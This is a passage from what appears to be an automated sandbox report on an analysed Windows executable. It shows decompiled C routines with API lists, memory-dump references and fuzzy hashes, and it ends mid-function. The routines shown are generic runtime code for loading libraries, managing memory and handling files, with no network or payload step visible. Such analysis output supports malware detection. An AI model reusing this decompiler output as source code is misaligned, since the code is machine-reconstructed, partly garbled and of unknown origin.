                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguage$SystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 384301227-0
                                                                                    • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                    • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                                                    • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                    • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 58%
                                                                                    			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				char _v8;
                                                                                    				short _v530;
                                                                                    				char _v536;
                                                                                    				char _v540;
                                                                                    				void* _t44;
                                                                                    				intOrPtr _t45;
                                                                                    				void* _t49;
                                                                                    				void* _t52;
                                                                                    
                                                                                    				_v536 = 0;
                                                                                    				_v540 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_t49 = __eax;
                                                                                    				_push(_t52);
                                                                                    				_push(0x40b2ee);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t52 + 0xfffffde8;
                                                                                    				GetModuleFileNameW(0,  &_v530, 0x105);
                                                                                    				E00408550( &_v536, _t49);
                                                                                    				_push(_v536);
                                                                                    				E0040858C( &_v540, 0x105,  &_v530);
                                                                                    				_pop(_t44); // executed
                                                                                    				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
                                                                                    				if(_v8 != 0) {
                                                                                    					LoadLibraryExW(E004084EC(_v8), 0, 2);
                                                                                    				}
                                                                                    				_pop(_t45);
                                                                                    				 *[fs:eax] = _t45;
                                                                                    				_push(E0040B2F5);
                                                                                    				E00407A80( &_v540, 2);
                                                                                    				return E00407A20( &_v8);
                                                                                    			}

                                                                                    Instruction addresses (address column of the C-code above; per-line alignment lost in extraction): 0x0040b241, 0x0040b247, 0x0040b24d, 0x0040b250, 0x0040b254, 0x0040b255, 0x0040b25a, 0x0040b25d, 0x0040b270, 0x0040b27d, 0x0040b288, 0x0040b29a, 0x0040b2a8, 0x0040b2a9, 0x0040b2b2, 0x0040b2c1, 0x0040b2c6, 0x0040b2ca, 0x0040b2cd, 0x0040b2d0, 0x0040b2e0, 0x0040b2ed

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileLibraryLoadModuleName
                                                                                    • String ID:
                                                                                    • API String ID: 1159719554-0
                                                                                    • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                    • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                                                    • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                    • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 60%
E00427154(void* __eax, void* __edx, void* __eflags) {
    int _v8;
    char _v16;
    long _v20;
    int _t13;
    intOrPtr _t27;
    void* _t32;
    void* _t34;
    intOrPtr _t35;

    _t32 = _t34;
    _t35 = _t34 + 0xfffffff0;
    if(E00427108(__eax,  &_v16) != 0) {
        _push(_t32);
        _push(0x4271b1);
        _push( *[fs:eax]);
         *[fs:eax] = _t35;
        _t13 = DeleteFileW(E004084EC(__edx)); // executed
        _v8 = _t13;
        _v20 = GetLastError();
        _pop(_t27);
         *[fs:eax] = _t27;
        _push(E004271B8);
        return E00427144( &_v16);
    } else {
        _v8 = 0;
        return _v8;
    }
}

Instruction addresses: 0x00427155 0x00427157 0x0042716c 0x00427177 0x00427178 0x0042717d 0x00427180 0x0042718b 0x00427190 0x00427198 0x0042719d 0x004271a0 0x004271a3 0x004271b0 0x0042716e 0x00427170 0x004271c9 0x004271c9

APIs
• DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
• GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
Similarity
• API ID: DeleteErrorFileLast
• String ID:
• API String ID: 2018770650-0
• Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
• Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
• Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
• Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 37%
E00421230(void* __eax, void* __ebx, int __edx) {
    struct HINSTANCE__* _v12;
    int _v16;
    int _t4;
    struct HINSTANCE__* _t9;
    void* _t12;
    intOrPtr _t16;
    void* _t18;
    void* _t19;
    intOrPtr _t20;

    _t18 = _t19;
    _t20 = _t19 + 0xfffffff4;
    _t12 = __eax;
    _t4 = SetErrorMode(__edx); // executed
    _v16 = _t4;
    _push(_t18);
    _push(0x4212a2);
    _push( *[fs:eax]);
     *[fs:eax] = _t20;
    asm("fnstcw word [ebp-0x2]");
    _push(_t18);
    _push(0x421284);
    _push( *[fs:eax]);
     *[fs:eax] = _t20;
    _t9 = LoadLibraryW(E004084EC(_t12)); // executed
    _v12 = _t9;
    _pop(_t16);
     *[fs:eax] = _t16;
    _push(0x42128b);
    asm("fclex");
    asm("fldcw word [ebp-0x2]");
    return 0;
}

Instruction addresses: 0x00421231 0x00421233 0x00421237 0x0042123a 0x0042123f 0x00421244 0x00421245 0x0042124a 0x0042124d 0x00421250 0x00421255 0x00421256 0x0042125b 0x0042125e 0x00421269 0x0042126e 0x00421273 0x00421276 0x00421279 0x0042127e 0x00421280 0x00421283

APIs
• SetErrorMode.KERNEL32 ref: 0042123A
• LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
• Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
• Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
• Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004052D4() {
    intOrPtr _t13;
    intOrPtr* _t14;
    int _t18;
    intOrPtr* _t23;
    void* _t25;
    void* _t26;
    void* _t28;
    void* _t31;

    _t28 =  *0x004BBADC;
    while(_t28 != 0x4bbad8) {
        _t2 = _t28 + 4; // 0x4bbad8
        VirtualFree(_t28, 0, 0x8000); // executed
        _t28 =  *_t2;
    }
    _t25 = 0x37;
    _t13 = 0x4b7080;
    do {
         *((intOrPtr*)(_t13 + 0xc)) = _t13;
         *((intOrPtr*)(_t13 + 8)) = _t13;
         *((intOrPtr*)(_t13 + 0x10)) = 1;
         *((intOrPtr*)(_t13 + 0x14)) = 0;
        _t13 = _t13 + 0x20;
        _t25 = _t25 - 1;
    } while (_t25 != 0);
     *0x4bbad8 = 0x4bbad8;
     *0x004BBADC = 0x4bbad8;
    _t26 = 0x400;
    _t23 = 0x4bbb78;
    do {
        _t14 = _t23;
         *_t14 = _t14;
        _t8 = _t14 + 4; // 0x4bbb78
         *_t8 = _t14;
        _t23 = _t23 + 8;
        _t26 = _t26 - 1;
    } while (_t26 != 0);
     *0x4bbaf4 = 0;
    E00405884(0x4bbaf8, 0x80);
    _t18 = 0;
     *0x4bbaf0 = 0;
    _t31 =  *0x004BDB80;
    while(_t31 != 0x4bdb7c) {
        _t10 = _t31 + 4; // 0x4bdb7c
        _t18 = VirtualFree(_t31, 0, 0x8000);
        _t31 =  *_t10;
    }
     *0x4bdb7c = 0x4bdb7c;
     *0x004BDB80 = 0x4bdb7c;
    return _t18;
}

Instruction addresses: 0x004052e2 0x004052f9 0x004052e7 0x004052f2 0x004052f7 0x004052f7 0x004052fd 0x00405302 0x00405307 0x00405309 0x0040530e 0x00405311 0x0040531a 0x0040531d 0x00405320 0x00405320 0x00405323 0x00405325 0x00405328 0x0040532d 0x00405332 0x00405332 0x00405334 0x00405336 0x00405336 0x00405339 0x0040533c 0x0040533c 0x00405341 0x00405352 0x00405357 0x00405359 0x0040535e 0x00405375 0x00405363 0x0040536e 0x00405373 0x00405373 0x00405379 0x0040537b 0x00405382

APIs
• VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
• VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
Memory Dump Source
• Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
• Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
• Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
• Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
E004232EC(long __eax, void* __edx) {
    short _v2052;
    signed int _t7;
    void* _t10;
    signed int _t16;
    void* _t17;

    _t10 = __edx;
    _t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
    while(_t7 > 0) {
        _t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
        if(_t16 <= 0x20) {
            L1:
            _t7 = _t7 - 1;
            __eflags = _t7;
            continue;
        } else {
            _t20 = _t16 - 0x2e;
            if(_t16 == 0x2e) {
                goto L1;
            }
        }
        break;
    }
    return E00407BA8(_t10, _t7, _t17, _t20);
}

Instruction addresses: 0x004232f3 0x0042330b 0x00423313 0x00423317 0x00423320 0x00423312 0x00423312 0x00423312 0x00000000 0x00423322 0x00423322 0x00423326 0x00000000 0x00000000 0x00423326 0x00000000 0x00423320 0x00423339

                                                                                    APIs
                                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FormatMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1306739567-0
                                                                                    • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                    • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                                                    • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                                    • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 31%
                                                                                    			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
                                                                                    				char _v8;
                                                                                    				intOrPtr _t21;
                                                                                    				intOrPtr _t24;
                                                                                    
                                                                                    				_push(0);
                                                                                    				_push(_t24);
                                                                                    				_push(0x422a5e);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t24;
                                                                                    				E004229AC(__eax, __ecx,  &_v8, __eflags);
                                                                                    				GetFileAttributesW(E004084EC(_v8)); // executed
                                                                                    				_pop(_t21);
                                                                                    				 *[fs:eax] = _t21;
                                                                                    				_push(E00422A65);
                                                                                    				return E00407A20( &_v8);
                                                                                    			}

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                    • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                                                    • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                                    • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
                                                                                    				void* _t17;
                                                                                    
                                                                                    				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
                                                                                    				return _t17;
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                    • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                                                    • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                                    • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00409FA8(void* __eax) {
                                                                                    				short _v532;
                                                                                    				void* __ebx;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t14;
                                                                                    				void* _t16;
                                                                                    				void* _t18;
                                                                                    				void* _t19;
                                                                                    				intOrPtr _t20;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t16 = __eax;
                                                                                    				_t22 =  *((intOrPtr*)(__eax + 0x10));
                                                                                    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                                    					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
                                                                                    					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
                                                                                    					_t20 = _t14;
                                                                                    					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
                                                                                    					if(_t20 == 0) {
                                                                                    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                                                    					}
                                                                                    				}
                                                                                    				return  *((intOrPtr*)(_t16 + 0x10));
                                                                                    			}

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                                                      • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                      • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 4113206344-0
                                                                                    • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                    • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                                                    • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                                                    • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00423ED8(intOrPtr* __eax) {
                                                                                    				int _t4;
                                                                                    				intOrPtr* _t7;
                                                                                    
                                                                                    				_t7 = __eax;
                                                                                    				_t4 = SetEndOfFile( *(__eax + 4)); // executed
                                                                                    				if(_t4 == 0) {
                                                                                    					return E00423CAC( *_t7);
                                                                                    				}
                                                                                    				return _t4;
                                                                                    			}

                                                                                    APIs
                                                                                    • SetEndOfFile.KERNEL32(?,7FBD0010,004B6358,00000000), ref: 00423EDF
                                                                                      • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 734332943-0
                                                                                    • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                    • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                                                    • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                                                    • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040CAA4() {
                                                                                    				intOrPtr _v16;
                                                                                    				struct _SYSTEM_INFO* _t3;
                                                                                    
                                                                                    				GetSystemInfo(_t3); // executed
                                                                                    				return _v16;
                                                                                    			}

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                    • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                                                    • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                                                    • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00403BCC(signed int __eax) {
                                                                                    				void* _t4;
                                                                                    				intOrPtr _t7;
                                                                                    				signed int _t8;
                                                                                    				void** _t10;
                                                                                    				void* _t12;
                                                                                    				void* _t14;
                                                                                    
                                                                                    				_t8 = __eax;
                                                                                    				E00403B60(__eax);
                                                                                    				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
                                                                                    				if(_t4 == 0) {
                                                                                    					 *0x4bbaf0 = 0;
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					_t10 =  *0x4bbadc; // 0x4bbad8
                                                                                    					_t14 = _t4;
                                                                                    					 *_t14 = 0x4bbad8;
                                                                                    					 *0x4bbadc = _t4;
                                                                                    					 *(_t14 + 4) = _t10;
                                                                                    					 *_t10 = _t4;
                                                                                    					_t12 = _t14 + 0x13fff0;
                                                                                    					 *((intOrPtr*)(_t12 - 4)) = 2;
                                                                                    					 *0x4bbaf0 = 0x13ffe0 - _t8;
                                                                                    					_t7 = _t12 - _t8;
                                                                                    					 *0x4bbaec = _t7;
                                                                                    					 *(_t7 - 4) = _t8 | 0x00000002;
                                                                                    					return _t7;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                    • Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
                                                                                    • Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
                                                                                    • Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E00403CF6(void* __eax) {
                                                                                    				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                                    				void* _v48;
                                                                                    				void* _t13;
                                                                                    				int _t20;
                                                                                    				void* _t22;
                                                                                    				signed int _t26;
                                                                                    				signed int _t29;
                                                                                    				signed int _t30;
                                                                                    				void* _t34;
                                                                                    				intOrPtr _t35;
                                                                                    				signed int _t39;
                                                                                    				void* _t41;
                                                                                    				void* _t42;
                                                                                    
                                                                                    				_push(_t29);
                                                                                    				_t42 = _t41 + 0xffffffdc;
                                                                                     				_t34 = __eax - 0x10; // the 16-byte block header sits just below the user pointer
                                                                                    				E00403C48();
                                                                                    				_t13 = _t34;
                                                                                    				 *_t42 =  *_t13;
                                                                                    				_v48 =  *((intOrPtr*)(_t13 + 4));
                                                                                    				_t26 =  *(_t13 + 0xc);
                                                                                     				if((_t26 & 0x00000008) != 0) { // header flag: block spans several VirtualAlloc regions, release each in turn
                                                                                    					_t22 = _t34;
                                                                                    					_t39 = _t26 & 0xfffffff0;
                                                                                    					_t30 = 0;
                                                                                    					while(1) {
                                                                                     						VirtualQuery(_t22,  &_v44, 0x1c); // 0x1c == sizeof(MEMORY_BASIC_INFORMATION) on 32-bit
                                                                                     						if(VirtualFree(_t22, 0, 0x8000) == 0) { // 0x8000 == MEM_RELEASE
                                                                                    							break;
                                                                                    						}
                                                                                    						_t35 = _v44.RegionSize;
                                                                                    						if(_t39 > _t35) {
                                                                                    							_t39 = _t39 - _t35;
                                                                                    							_t22 = _t22 + _t35;
                                                                                    							continue;
                                                                                    						}
